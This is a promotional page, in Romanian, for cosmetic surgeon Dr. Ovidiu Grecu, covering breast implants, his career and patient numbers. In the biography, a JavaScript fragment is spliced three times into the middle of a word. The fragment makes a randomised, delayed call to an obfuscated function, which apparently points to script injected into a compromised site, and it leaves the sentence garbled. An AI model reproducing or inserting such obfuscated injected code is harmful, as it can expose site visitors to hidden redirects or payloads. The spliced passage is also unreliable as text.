surgery_body_en

Dr. Ovidiu Grecu

Despre operatii estetice

Operatiile estetice au menirea de-a imbunatati acele parti ale
corpului nostru care nu sunt dezvoltate perfect sau in
asimetrie cu restul caracteristicilor anatomice ale corpului.
bkgd31

Dr. Ovidiu Grecu

Proteze Mamare

Implanturile mamare sunt de diferite tipuri si forme,
cu diferite invelisuri si continuturi. Impreuna cu
chirurgul dumneavoastra veti alege tipul si forma protezei,
pentru a putea ajunge la rezultatul care-l doriti.

Despre Dr. Ovidiu Grecu

Dr. Ovidiu Grecu lucreaza din 1997 in chirurgia estetica responsabila si de atunci rezultatele sale i-au adus faima de care se bucura in lumea medicala drept un chirurg responsabil si respectat. Numeroasele congrese din tara si din strainatate la care a participat in cei 15 ani de experienta chirurgicala aplicata zi de zi, i-au actualizat doctorului principiile si cunostintele medicale dobandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andite la Universitatea de Medicina si Farmacie Craiova.

Pacienti din toata tara dar si din strainatate aleg sa vina la dr. Grecu  pentru a-si rezolva problemele de estetica cu care se confrunta, si odata intrati in clinica se intorc si peste ani  cu dorinta de-a imbunatati si altceva. Echipa medic-pacient se creeaza din faza incipienta a consultatiei, deoarece in acest moment dorinta pacientei este identificata de chirurg si insumata cu principii, limite si riscuri medicale, prin care se atinge un rezultat responsabil si cu aspect natural care va fi multumitor pentru  ambele parti.

Dr. Ovidiu Grecu este recunoscut pentru  corectitudine si responsabilitate chirurgicala.
Profesionalismul doctorului Ovidiu Grecu consta in RESPECT pentru pacient de la inceput pana la incheierea actului terapeutic.

Mai multe detalii despre chirurgul Ovidiu Grecu veti afla in cadrul unei consultatii profesioniste care nu dureaza niciodata mai putin de 2 ore.

 Operatiile estetice – dr Ovidiu Grecu

Cifrele care vorbesc despre dr. Ovidiu Grecu

1891

Chirurgia Sanului

896

Chirurgia Fetei

711

Chirurgia Siluetei

1125

Infrumusetare fara Bisturiu

Suna Acum!
Navigheaza!